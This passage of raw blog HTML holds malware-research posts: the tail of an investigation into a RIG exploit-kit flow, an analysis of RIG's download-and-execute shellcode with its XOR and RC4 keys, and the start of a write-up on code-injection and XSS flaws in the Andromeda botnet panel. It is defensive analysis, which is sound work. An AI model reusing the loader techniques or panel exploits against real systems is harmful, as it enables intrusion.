<tr><td class="tr-caption" style="text-align: center;"><a href="https://www.virustotal.com/en/ip-address/54.207.49.189/information/">Virustotal results</a></td></tr>
</tbody></table>
As no sample was available related to the Andromeda panel, what commands and other files that might have been downloaded on infection remains a mystery.<br />
<br />
<br />
<h4>
Prepare to get RickRolled!</h4>
All of the executables have one thing in common, which is that they are obfuscated with the same crypter, written in .NET, which limits the amount of victims that might be infected as .NET Framework must be installed.<br />
<br />
Although the name of the crypter is unknown, it carries a rather interesting message when looking at the strings:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnFOLuaE1PFBedoFyElGtOa-rWjQwiCH6AVnttm6Sy1rn0c2VZ_ci0n0PHYMM4UUaRk380NhhLch0YbOLkS6URm8NSMBwjQZrAXypkWE-cDIe_GjVEbTTTJqmu1XLTlQu-lrka2oi-sU/s1600/rickroll.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnFOLuaE1PFBedoFyElGtOa-rWjQwiCH6AVnttm6Sy1rn0c2VZ_ci0n0PHYMM4UUaRk380NhhLch0YbOLkS6URm8NSMBwjQZrAXypkWE-cDIe_GjVEbTTTJqmu1XLTlQu-lrka2oi-sU/s1600/rickroll.png" height="52" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Link to YouTube playing 10 hour Rick Roll</td></tr>
</tbody></table>
Funny...anyway, unpacking was as trivial as putting a breakpoint on WriteProcessMemory and dumping the unpacked code from memory. Yet another layer of obfuscation was used before ending up with a plain Betabot:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMDxsWShuenp7B7gISLGSNuPPnc2pwp6BRXf_0Q-LUCMudzzOnm0lo809486lTk78z4xhytstgtR-TgGLbmR0E0gT55FBzr-91uQYE7GjgshI8FPl0OpAVnSIHVT_x3kbISfbfvV47CZY/s1600/betabot_strings.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMDxsWShuenp7B7gISLGSNuPPnc2pwp6BRXf_0Q-LUCMudzzOnm0lo809486lTk78z4xhytstgtR-TgGLbmR0E0gT55FBzr-91uQYE7GjgshI8FPl0OpAVnSIHVT_x3kbISfbfvV47CZY/s1600/betabot_strings.png" height="149" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Betabot strings</td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
The only file that didn't turn out to be Betabot was the file located in /im3/ which turned out to be Imminent Monitor (IM):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtkq0Zqxoe1wlv4_rB7W9iwCum006zK9pRVmzSIbk1EP_IRobX8C1tiYGu0jKcDsaazDU_XXatNpuXzUabeH1h3YHSQyRjpLIjUK2_Dl7X5HbbMMKX_hlWg9329ezcr5KBwhqiFTqz1jY/s1600/imminent_strings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtkq0Zqxoe1wlv4_rB7W9iwCum006zK9pRVmzSIbk1EP_IRobX8C1tiYGu0jKcDsaazDU_XXatNpuXzUabeH1h3YHSQyRjpLIjUK2_Dl7X5HbbMMKX_hlWg9329ezcr5KBwhqiFTqz1jY/s1600/imminent_strings.png" height="120" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdeBW557Ak6i9CRh1QMPnnrNueKd3xMNy68bVPq-T8RcE5M_OMpvdRPXSfAkY1hLecXAmVBYj-07z9Hcl-seas7SZ3NQC2uhRE3ReVjACJ6lrXTkJawFVaOB4Bee1lAUK8BLz7E6qIoUQ/s1600/imminent_strings2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdeBW557Ak6i9CRh1QMPnnrNueKd3xMNy68bVPq-T8RcE5M_OMpvdRPXSfAkY1hLecXAmVBYj-07z9Hcl-seas7SZ3NQC2uhRE3ReVjACJ6lrXTkJawFVaOB4Bee1lAUK8BLz7E6qIoUQ/s1600/imminent_strings2.png" height="76" width="400" /></a></div>
IM is a RAT developed by Shockwave. It's sold publicly on its own website as well as on forums and it seems to be quite popular. As with the crypter mentioned earlier, IM is written in .NET as well and will thereby not run on all systems.<br />
<br />
An interesting note is that the IM sample was uploaded 3rd Feb, and on 8th Feb, Genocide (the username assoicated with the RIG flow) posted a thread where he is selling his license for IM:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtMo7K8bX48Kq7xR1RqylXHUIAQFRzpkTDuZdBMu8QndQpYDRyDghLUfD0NlwcQKoPwaX-rNPJkZ3JXEzS5OI3wHb9xrg4Zibd7YXZ2e9BjDoi2giI9rMf47uWWVCpVp_0zZB-5l4ZupM/s1600/im3_license_selling.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtMo7K8bX48Kq7xR1RqylXHUIAQFRzpkTDuZdBMu8QndQpYDRyDghLUfD0NlwcQKoPwaX-rNPJkZ3JXEzS5OI3wHb9xrg4Zibd7YXZ2e9BjDoi2giI9rMf47uWWVCpVp_0zZB-5l4ZupM/s1600/im3_license_selling.png" height="155" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Selling IM3 license</td></tr>
</tbody></table>
This shortly after the /im3/-directory was removed. It is however unclear if this directory is tied to Genocide in the forums. The flow is however linked to this forum user.<br />
<br />
<br />
<h4>
Connecting all the dots and do some visualizing</h4>
For this particular case I decieded to use <a href="http://www.yworks.com/en/products/yfiles/yed/">yEd</a> to connect all the entities and create an overview of what have been found during the investigation, this also includes destinations on which the samples communicated.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmHhIfODZ3HDRZ8FaJ6OucH7cPLfX77byxeIuA6TizZgcyer7BvSzXFu7hAqbGPeuh4w2a726Geh3DPR1LyD2hEKluCEhuso_O4iRU4n4Qrf6WUBWmYkxE_R5eF2pXnCQnnPtVObs9PY/s1600/graph_graphml_-_yEd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmHhIfODZ3HDRZ8FaJ6OucH7cPLfX77byxeIuA6TizZgcyer7BvSzXFu7hAqbGPeuh4w2a726Geh3DPR1LyD2hEKluCEhuso_O4iRU4n4Qrf6WUBWmYkxE_R5eF2pXnCQnnPtVObs9PY/s1600/graph_graphml_-_yEd.png" height="282" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
All files mentioned are available on demand.Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-82413134469179878952014-12-01T11:57:00.000-08:002014-12-02T12:27:58.518-08:00RIG Exploit Kit - Shellcode analysis<a href="https://twitter.com/malware_traffic">Brad</a> published a <a href="http://malware-traffic-analysis.net/2014/11/16/index.html">traffic analysis exercise</a> which I had a quick look at and felt that I wanted to take it to the next level so I started looking at how to decode the payload delivered by the exploit kit.<br />
<br />
I get the shellcode from the Flash exploit as it's provided as a hex-encoded string starting with "90909090" (NOP):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpuOj4cni0xNuluLNAK-1PLYNpBD-mGRt9YFQ84VsAYKMMZMyjQQuCI3WFKut0ivjaZpvLZb3clSIy-Vfq5YxKxvWyVnPWmIwYSQs5qwb3nGDFYxBN7pfNReX82RPWS4_6Avp9QJFs_qQ/s1600/rig_shellcode_flash_nop.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpuOj4cni0xNuluLNAK-1PLYNpBD-mGRt9YFQ84VsAYKMMZMyjQQuCI3WFKut0ivjaZpvLZb3clSIy-Vfq5YxKxvWyVnPWmIwYSQs5qwb3nGDFYxBN7pfNReX82RPWS4_6Avp9QJFs_qQ/s1600/rig_shellcode_flash_nop.png" height="56" width="400" /></a></div>
An easy way to go is to create an executable from the shellcode utilizing <a href="http://sandsprite.com/shellcode_2_exe.php">Shellcode2Exe</a> to be able to step through it in OllyDbg.<br />
<br />
<i><b><span style="font-size: large;">Taking the step into shellcode</span></b></i><br />
Loading it up in Olly, it will start with a loop which decodes the payload URL using XOR as seen below. The key can be found by inspecting ESI when first hitting the loop and the encoded data can be found by inspecting EDI.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZPhqb6shTiXBP4vtUTW4AH_6IcIplA1PZGXOhFFIzYNEw0Z9AHrDMTYiCvk3d_cYPyG-BbWA7H2VUXn3xYP6BkMCYrMsl0drhQlwAWAsuTaXXhkSQGsMxaq1JrCM4FfGntzZkcyVJVAE/s1600/rig_shellcode_xor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZPhqb6shTiXBP4vtUTW4AH_6IcIplA1PZGXOhFFIzYNEw0Z9AHrDMTYiCvk3d_cYPyG-BbWA7H2VUXn3xYP6BkMCYrMsl0drhQlwAWAsuTaXXhkSQGsMxaq1JrCM4FfGntzZkcyVJVAE/s1600/rig_shellcode_xor.png" height="320" width="281" /></a></div>
After decoding:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibcdTpzjotHRxDxVm4QNRKagwcawuAWuKNuKdMsW0XbkP5xGpEfz30Mu5loraZqnWUPr8zDIpxnePR88EZ9Ra7JDJcmz4y0bydqzmAHheQSUyfkZdu_g2JNM3T0sACLdz72oEK0Sik-YA/s1600/rig_shellcode_xor_decoded.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibcdTpzjotHRxDxVm4QNRKagwcawuAWuKNuKdMsW0XbkP5xGpEfz30Mu5loraZqnWUPr8zDIpxnePR88EZ9Ra7JDJcmz4y0bydqzmAHheQSUyfkZdu_g2JNM3T0sACLdz72oEK0Sik-YA/s1600/rig_shellcode_xor_decoded.png" height="114" width="320" /></a></div>
The decoding loop will continue until the decoded byte is "!" (0x21), the reason will be explained later in the post under "Multiple payloads".<br />
<br />
The shellcode uses <a href="http://msdn.microsoft.com/en-us/library/ie/ms775122%28v=vs.85%29.aspx">URLDownloadToCacheFileA</a> to download the payload. Should the payload be successfully downloaded, it will be opened with <i>CreateFileA</i> and read with <i>ReadFile</i> into memory allocated using <i>VirtualAlloc</i>.<br />
<br />
After reading the file it will be decrypted using RC4 cipher with a key defined in the shellcode. I recommend <a href="http://vrt-blog.snort.org/2014/06/an-introduction-to-recognizing-and.html">reading the post</a> from VRT on how to recognize RC4 when debugging. This is the function found in the shellcode:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizqWyhBZoIUziPUIAekqHwoWfs0OQiqi8q1yci6Cu4b5rZG-A-HnLk-GfgLUA22nZZdFGylKrALpl1Kyf07TPmJKK9BRCxoEdqeZBmEpAqf7BfCOCDMttjB7QaOJ807YxRKN9_V0EMXg4/s1600/rig_shellcode_rc4_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizqWyhBZoIUziPUIAekqHwoWfs0OQiqi8q1yci6Cu4b5rZG-A-HnLk-GfgLUA22nZZdFGylKrALpl1Kyf07TPmJKK9BRCxoEdqeZBmEpAqf7BfCOCDMttjB7QaOJ807YxRKN9_V0EMXg4/s1600/rig_shellcode_rc4_function.png" height="284" width="320" /></a></div>
Inspecting EDI when hitting the above lines it's found to have the following content:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgMIt-2_FpDStcrBuYpNWs0McMGHDqNIfgLIn0a8U1frOEL10-Z3FGg8cOXlK2H1WOcDLWLOfDShdQ6B7Mq9s_QBuw6q7DXsNX1aBs38itzlpenb9AY6COEYWMUS9UW-cmFRCvbCBtZRk/s1600/rig_shellcode_rc4_key.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgMIt-2_FpDStcrBuYpNWs0McMGHDqNIfgLIn0a8U1frOEL10-Z3FGg8cOXlK2H1WOcDLWLOfDShdQ6B7Mq9s_QBuw6q7DXsNX1aBs38itzlpenb9AY6COEYWMUS9UW-cmFRCvbCBtZRk/s1600/rig_shellcode_rc4_key.png" height="80" width="320" /></a></div>
EDI is pointing to the first byte of the key and EBP holds the key length which is 5 giving the key <b>m3S4V</b>. <br />
<br />
At this point it's possible to let the shellcode run until <i>CloseHandle</i> is called and the decoded payload has been written back to disk or write a script for decoding the payload extracted from the PCAP. A small implementation of the RC4 cipher can be found <a href="http://www.joonis.de/en/code/rc4-algorithm">here</a> (Python).<br />
<br />
<i><b><span style="font-size: large;">Multiple payloads</span></b></i><br />
What is the most interesting thing about the shellcode is that it carries more functionality than isn't used. The shellcode is used to download one payload, but the shellcode supports multiple payloads. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTI3lqxgYAgkOBlpgc0PFaJhNgxPiq4Qz2rXUu_ZB5c5WvcFjIPhafSdu20Ig8VaqTVxz3DlrTsc77WG7K4Mav9LaLrSTCl4dpFJ-27CpbzHiYh_Nfb2tCXOHd3ptFLmCr8Sqh89X92po/s1600/rig_shellcode_multiple.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTI3lqxgYAgkOBlpgc0PFaJhNgxPiq4Qz2rXUu_ZB5c5WvcFjIPhafSdu20Ig8VaqTVxz3DlrTsc77WG7K4Mav9LaLrSTCl4dpFJ-27CpbzHiYh_Nfb2tCXOHd3ptFLmCr8Sqh89X92po/s1600/rig_shellcode_multiple.png" height="95" width="400" /></a></div>
<br />
After calling CreateProcessA, the shellcode will step through the recently used URL looking for the end of the string (0x00), and comparing the next byte with "!" (0x21). If it's true, the shellcode will end otherwise it will start over with a new payload. <br />
An example of URL-list would look like this:<br />
<pre class="brush: js"><i><url1>0x00<url2>0x00<urlN>0x0021</i></pre>
<br />
<br />
<i><b><span style="font-size: large;">Conclusion of sorts</span></b></i><br />
RIGs shellcode have the capability to download and execute multiple payloads which are encrypted using RC4 (5 byte key). The URL-list is encoded using XOR (5 byte key).<br />
<br />
API-calls used in the shellcode (in order of first call):<br />
<i>- LoadLibraryA </i><br />
<i>- URLDownloadToCacheFileA</i><br />
<i>- CreateFileA</i><br />
<i>- VirtualAlloc </i><br />
<i>- ReadFile</i><br />
<i>- SetFilePointer</i><br />
<i>- WriteFile</i><br />
<i>- VirtualFree </i><br />
<i>- CloseHandle </i><br />
<i>- CreateProcessA</i><br />
<br />
You can find the hex-encoded shellcode on [<a href="http://pastebin.com/sum6RXiZ">pastebin</a>].Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-19412262528618965742014-10-09T09:45:00.000-07:002014-10-09T17:27:12.856-07:00Andromeda - Vulnerabilities and EnumerationAndromeda has been around for quite some time and is a well known loader capable of both formgrabbing and keylogging. The bot has been well documented on several blogs around the web, however, I've not seen anyone taking a closer look at the panel source code, so when I stumbled upon the latest version of the panel I decided to take a look to see if there is anything useful in terms of vulnerabilities.<br />
<br />
I was able to acquire logs during one of my investigations which illustrate how Andromeda is sold to the buyers and how to acquire the panel. It's sold through using an automated system, commands available to the buyer is shown below:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-mJchFtCmklgFW7jFeIOjt9kiriX0cLVr9DoKLU6dRtiqNTuwi7LuXF7G6wFRU70JM7Ug0QPeInQgum50vX5YlYSEljj9NtqymlUOZ2eHeo-TjgolThicp8EmYck96QehyphenhyphenLuDLcKPikI/s1600/andromeda_seller.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-mJchFtCmklgFW7jFeIOjt9kiriX0cLVr9DoKLU6dRtiqNTuwi7LuXF7G6wFRU70JM7Ug0QPeInQgum50vX5YlYSEljj9NtqymlUOZ2eHeo-TjgolThicp8EmYck96QehyphenhyphenLuDLcKPikI/s1600/andromeda_seller.png" height="250" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Available commands for buyers</td></tr>
</tbody></table>
<br />
<h4>
Admin panel</h4>
The panel comes in a password protected RAR-archive which holds:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjczx0XdDwK0KhlOriv8qYtsMHV8vse0aGiarWgpufRKKheYlvxA4LB9VWRMSbzz5RqOM7TVFMScG2F2hyphenhyphenP4dkof9uuZ3QJ3HlCQ70R1KI7vNsE5Tpi8kF9GwFb13O7LcmKKCtPLQrMGA4/s1600/andromeda_panel_files.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjczx0XdDwK0KhlOriv8qYtsMHV8vse0aGiarWgpufRKKheYlvxA4LB9VWRMSbzz5RqOM7TVFMScG2F2hyphenhyphenP4dkof9uuZ3QJ3HlCQ70R1KI7vNsE5Tpi8kF9GwFb13O7LcmKKCtPLQrMGA4/s1600/andromeda_panel_files.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Andromeda Panel</td></tr>
</tbody></table>
Check out <a href="http://malware.dontneedcoffee.com/2012/07/inside-andromeda-bot-v206-webpanel-aka.html">this post</a> by <a href="https://twitter.com/kafeine">@kafeine</a> on how to panel looks in general, this post focus mostly on the source code and functionality.<br />
<br />
Starting from the top with <b>adm.php</b> it is packed:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFHMRT9LgLCMj4QjsQ_MzolayQMLOSskNN1bf1LSjISjHqQpUV5rcsi907yfHDJzT-m0O8gK6HbMnk6Y94UHv5Ph9GgrKKuUbzak6RR1idgzkP6TNqNDzED3C0m-i_KvtdUupo_nkYlp8/s1600/andromeda_adm_obfuscated.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFHMRT9LgLCMj4QjsQ_MzolayQMLOSskNN1bf1LSjISjHqQpUV5rcsi907yfHDJzT-m0O8gK6HbMnk6Y94UHv5Ph9GgrKKuUbzak6RR1idgzkP6TNqNDzED3C0m-i_KvtdUupo_nkYlp8/s1600/andromeda_adm_obfuscated.png" height="42" width="400" /></a></div>
<br />
After unpacking and formatting it ends up with a layer of string obfuscation as shown in the extract:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwd9UViAmULZYD3Ud7sUq_x-aFY_fIVXY7FqEdGv71DDsbAGjMprsG-YE9MrEcq0081-qTS3LR6iXRppVDLLaALJmufPxiuS4J50Am0Ym-EUbbV8Tnk8z-guI3MRyjlWkNGWFtNIj3AlA/s1600/andromeda_adm_extract.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwd9UViAmULZYD3Ud7sUq_x-aFY_fIVXY7FqEdGv71DDsbAGjMprsG-YE9MrEcq0081-qTS3LR6iXRppVDLLaALJmufPxiuS4J50Am0Ym-EUbbV8Tnk8z-guI3MRyjlWkNGWFtNIj3AlA/s1600/andromeda_adm_extract.png" height="167" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Unpacked code with obfuscated strings</td></tr>
</tbody></table>
The strings are decoded using the below function where the first parameter is the encoded string and the second is the key:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqgi0-NAEIGpkJM7SAqCwuL3-U1AF5KQibbMckAyo01VbRF2avsQj36kz5XIK0FXWtaBjVU8f2F0BCpFXRP1dm5CjZWyCN8SH70Y5OYV6W7wDcrvsno4xLC_PNRNQX_jLi9Bi4Atu4zI4/s1600/andromeda_adm_crypt.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqgi0-NAEIGpkJM7SAqCwuL3-U1AF5KQibbMckAyo01VbRF2avsQj36kz5XIK0FXWtaBjVU8f2F0BCpFXRP1dm5CjZWyCN8SH70Y5OYV6W7wDcrvsno4xLC_PNRNQX_jLi9Bi4Atu4zI4/s1600/andromeda_adm_crypt.png" height="75" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Function for decoding strings</td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<br />
<br />
<br />
Using that same function together with some PHP "preg_match-magic" the code ends up much more readable.<br />
<br />
<h3>
PHP Code Injection (requires credentials)</h3>
One function that stood out in the code was <b>SaveSettings</b>:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbU9gdCnwzbjxh4ekZpn2jBTF0_4Rv1McYGLgfDznz32T-S-4z8i6zUYGXSDOlnYu9yFTylGyBzjLDBKsTsUgB-TSIrQQ8qtjp9v_fhJ1su7wMAcBOMU-irMP4CRyaABgdtuJaPMIT7iI/s1600/andromeda_adm_savesettings.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbU9gdCnwzbjxh4ekZpn2jBTF0_4Rv1McYGLgfDznz32T-S-4z8i6zUYGXSDOlnYu9yFTylGyBzjLDBKsTsUgB-TSIrQQ8qtjp9v_fhJ1su7wMAcBOMU-irMP4CRyaABgdtuJaPMIT7iI/s1600/andromeda_adm_savesettings.png" height="126" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">SaveSettings to config (note: syntax is somewhat off)</td></tr>
</tbody></table>
The settings are written directly to file, without any checks for malformed content in the actual values. There is no validation done from the code where the function is called from either, opening up for PHP code injection.<br />
<br />
Example:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHEeQsr8jKLzNyyJCojUXLdCz_-LkZ3rQmNVEJkWwKe4hPO4fkpm9cHtA3wm06LJ1VDbYVUI-Wwds7c0DjyJG1Y5Mw-6bjgXHn5F1dJTlNbbzW_RNzyHeTjKEFS956u2T3K2KMebeH35w/s1600/andromeda_adm_rce.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHEeQsr8jKLzNyyJCojUXLdCz_-LkZ3rQmNVEJkWwKe4hPO4fkpm9cHtA3wm06LJ1VDbYVUI-Wwds7c0DjyJG1Y5Mw-6bjgXHn5F1dJTlNbbzW_RNzyHeTjKEFS956u2T3K2KMebeH35w/s1600/andromeda_adm_rce.png" height="271" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Writing PHP code to config</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCH2KNLR4RZmNrqDU8UwNp1zGxIr43ZbYVqALgy-XeZJHGUta1ZmnntciIhF9N2XrOydOkduHxCMmK2DlrbsXWuDwPJimNMrizzNIlrkj-J1eUvSfyA5qH1b9NE9PGCrPMRUnhpImF-6k/s1600/andromeda_adm_cmd.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCH2KNLR4RZmNrqDU8UwNp1zGxIr43ZbYVqALgy-XeZJHGUta1ZmnntciIhF9N2XrOydOkduHxCMmK2DlrbsXWuDwPJimNMrizzNIlrkj-J1eUvSfyA5qH1b9NE9PGCrPMRUnhpImF-6k/s1600/andromeda_adm_cmd.png" height="70" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Executing commands through config.php</td></tr>
</tbody></table>
<br />
<h3>
Cross Site Scripting (requires credentials)</h3>
As it's possible to add tasks which are then listed in the panel, the code for adding them reveal that no validation is done for injecting for example Javascript and HTML:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZRB-gOjFJbdCfKHwLntaPu3nrB2y4RiEwpSGrpub0Dr5QHP-0mXdnNOQDQ8bZv_Zz4RLdyd5MN0VKiAvnDVg74OM_hhCFglsTKwqEQVpAJtGxnyJioglOVhfgTloMzzOl3QS_K3A8Log/s1600/andromeda_adm_tasks.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZRB-gOjFJbdCfKHwLntaPu3nrB2y4RiEwpSGrpub0Dr5QHP-0mXdnNOQDQ8bZv_Zz4RLdyd5MN0VKiAvnDVg74OM_hhCFglsTKwqEQVpAJtGxnyJioglOVhfgTloMzzOl3QS_K3A8Log/s1600/andromeda_adm_tasks.png" height="212" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code for adding tasks to database</td></tr>
</tbody></table>
Leveraging the URL-field, whatever code that is injected will be executed if the tasklist is viewed.<br />
<br />
Example:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE4ZKhLAFj1ecCF5PEI0o35qIX3p-8JvIYm8V7BY92v2XqhSYiV-DLsmrpqaSYhTMc0ieekxqte6At3q8cU1OrLlbhcMQAtuxFhWV9-nEgyWx_PalDbMGsR88msRmTWT6hLk-_47WVYjo/s1600/andromeda_adm_xss_code.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE4ZKhLAFj1ecCF5PEI0o35qIX3p-8JvIYm8V7BY92v2XqhSYiV-DLsmrpqaSYhTMc0ieekxqte6At3q8cU1OrLlbhcMQAtuxFhWV9-nEgyWx_PalDbMGsR88msRmTWT6hLk-_47WVYjo/s1600/andromeda_adm_xss_code.png" height="226" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Javascript saved in the URL field</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
